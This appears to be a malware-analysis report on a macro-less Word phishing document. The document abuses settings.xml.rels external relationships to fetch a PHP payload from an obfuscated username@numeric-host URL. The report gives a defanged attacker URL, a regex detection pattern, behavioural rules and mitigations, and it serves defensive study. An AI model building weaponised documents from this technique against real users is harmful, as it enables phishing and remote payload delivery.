External Template Injection via settings.xml.rels with Embedded Excel Object and Obfuscated PHP Retrieval

7 hours ago
sorb
5 minutes

1. Executive Summary

During static malware analysis of a malicious Microsoft Word document, we identified a weaponized OpenXML structure leveraging external relationship injection via word/_rels/settings.xml.rels. The document contained a TargetMode="External" relationship referencing a highly obfuscated URL formatted as:

hxxp://<long_hex_string>@<numeric_host>/<payload>.php

Additionally, the document embedded an Excel object under word/embeddings/*.xlsx, likely serving as a lure component to reduce user suspicion.

This technique enables remote payload retrieval while bypassing traditional static detection mechanisms that focus solely on macros or document content. The abuse of the username@host URL format combined with a numeric-only host significantly reduces signature-based detection reliability.

Organizations relying primarily on macro detection or traditional static scanning are particularly exposed. Email-borne threats remain the primary delivery mechanism.

Risk Level: High
Primary Impacted Sectors: Enterprise environments with email-based document workflows
Key Mitigation Focus: External relationship monitoring, behavioral endpoint detection, and email-layer content inspection.

2. Background & Context

External relationship abuse in Office OpenXML documents has been publicly documented in multiple campaigns involving:

  • Remote Template Injection
  • OLE Object Injection
  • Exploitation chains related to Microsoft Word
  • Techniques associated with MITRE ATT&CK T1204 abuse

Historically, campaigns exploiting external relationships have overlapped with techniques seen in exploitation chains such as CVE-2017-0199, where malicious documents triggered remote content execution without macros.

What makes this variant notable:

  • Use of settings.xml.rels instead of commonly inspected document.xml.rels
  • Obfuscated credential-style URL structure
  • Embedded .xlsx object to mimic legitimate business content

The increasing restriction of VBA macros in enterprise environments has shifted adversaries toward relationship-based payload staging, making this technique operationally relevant today.

3. Research Scope & Methodology

Sample Source:

  • Automated sandbox detonation (Cuckoo-based static and dynamic pipeline)
  • Email telemetry ingestion
  • Internal threat hunting dataset

Timeframe:

  • Recent sample cluster observed within 30-day ingestion window

Scope Limitations:

  • Static analysis of OpenXML structure
  • No confirmed post-delivery payload execution due to sinkholed infrastructure

Analytical Approach:

  • OpenXML archive extraction
  • Relationship file inspection
  • Regex-based IOC extraction
  • Structural anomaly comparison against benign Office baselines
  • Behavioral review in sandbox environment

4. Technical Analysis

4.1 Initial Access Vector

The attack vector is a phishing email delivering a Microsoft Word document (.docx). The document does not contain VBA macros.

Instead, it abuses:

word/_rels/settings.xml.rels

to define an external relationship with:

TargetMode="External"

This forces Word to attempt remote retrieval when the document is processed.

4.2 Payload Structure

The malicious relationship contains a URL formatted as:

hxxp://B6B6B6B6B6B6B6B6BB6BB6B6B6B6B6B6B@00005631326225/<random>.php

Key anomalies:

ComponentObservation
Username field16+ character hex string
Host fieldNumeric-only domain
PathPHP endpoint
RelationshipTargetMode=”External”

The username@host syntax is leveraged to:

  • Obfuscate domain reputation checks
  • Confuse URL parsers
  • Evade simplistic IOC extraction logic

4.3 Execution Chain

  1. User opens Word document.
  2. Word parses settings.xml.rels.
  3. External relationship is resolved.
  4. HTTP request initiated to remote PHP endpoint.
  5. Server responds with staged payload (in observed samples, infrastructure inactive).

No macro execution is required.

4.4 Persistence Mechanism

No persistence mechanism observed within the document itself.
This technique is a stager delivery vector, not a persistence implant.

Persistence would depend on downstream payload.

4.5 Network Communication

Characteristics:

  • Plain HTTP
  • Numeric-only hostname
  • No valid DNS-based domain structure
  • Likely short-lived infrastructure

Example (defanged):

hxxp://b6b6b6b6b6b6b6b6bb6bb6b6b6b6b6b6b@00005631326225/payload.php

Such numeric hosts frequently evade domain-based threat intelligence feeds.

4.6 Defense Evasion Techniques

TechniqueDescription
URL credential obfuscationusername@host format
Numeric-only hostAvoids domain reputation triggers
Non-macro executionBypasses macro-blocking controls
Embedded Excel lureReduces suspicion
Alternate relationship fileAvoids detection tuned for document.xml.rels

5. Indicators of Compromise (IOCs)

TypeIndicator (Defanged)Description
URLhxxp://b6b6b6b6b6b6b6b6bb6bb6b6b6b6b6b6b@00005631326225/payload.phpExternal PHP retrieval
File Pathword/_rels/settings.xml.relsModified relationship file
File Pathword/embeddings/*.xlsxEmbedded Excel lure object
XML AttributeTargetMode=”External”External relationship indicator
Patternhttps?://[A-Fa-f0-9]{16,}@[0-9]{6,}/.*.phpSuspicious URL format

6. Detection Opportunities

Email Layer Detection

  • Flag .docx files containing:
    • TargetMode="External"
    • External .php references
    • Numeric-only hostnames
  • Parse all *.rels files, not just document.xml.rels
  • Detect embedded OLE/Excel object + external relationship combination

Endpoint Detection Logic

Monitor:

  • WINWORD.EXE initiating outbound HTTP to:
    • Numeric-only domains
    • Hosts without DNS resolution
    • .php endpoints

Behavioral detection rule example:

Process: WINWORD.EXE
Network: HTTP outbound
Destination: numeric-only hostname

Network Detection Opportunities

  • Block HTTP to numeric-only hosts
  • Detect HTTP requests containing @ before host separator
  • Alert on Office process user-agent anomalies

Behavioral Detection Suggestions

  • Word spawning:
    • mshta.exe
    • powershell.exe
    • cmd.exe
  • Word performing direct HTTP fetch on document open
  • Word resolving external relationship immediately after file load

7. MITRE ATT&CK Mapping

TacticTechniqueID
Initial AccessPhishing AttachmentT1566.001
ExecutionUser ExecutionT1204
Command and ControlApplication Layer ProtocolT1071
Defense EvasionObfuscated/Compressed FilesT1027
Defense EvasionTrusted Developer Utilities Proxy ExecutionT1218

8. Mitigation & Recommendations

Immediate Actions

  • Block numeric-only outbound HTTP destinations
  • Inspect and quarantine Office documents with external relationships
  • Disable automatic update of external links in Office Group Policy
  • Enforce outbound web filtering for Office processes

Strategic Improvements

  • Implement full OpenXML structural inspection in email security stack
  • Deploy behavioral EDR detection for Office outbound communication
  • Add relationship-file parsing to sandbox pipelines
  • Threat hunt for:
    • settings.xml.rels external references
    • Embedded .xlsx with no business justification
  • Incorporate custom YARA or Cuckoo signature detection

9. Conclusion

This research demonstrates continued adversarial adaptation toward macro-less document-based delivery techniques. By abusing settings.xml.rels and leveraging obfuscated credential-style URLs with numeric hosts, attackers bypass many legacy inspection controls.

The presence of embedded Excel objects further increases plausibility while maintaining stealth.

Organizations must move beyond macro detection and implement:

  • Structural OpenXML inspection
  • Behavioral endpoint detection
  • Numeric-host outbound filtering

As macro hardening increases globally, we expect continued growth in relationship-based remote retrieval techniques and alternate XML component abuse within Office documents.

Proactive detection engineering in this area will significantly reduce exposure to modern phishing and staged payload campaigns.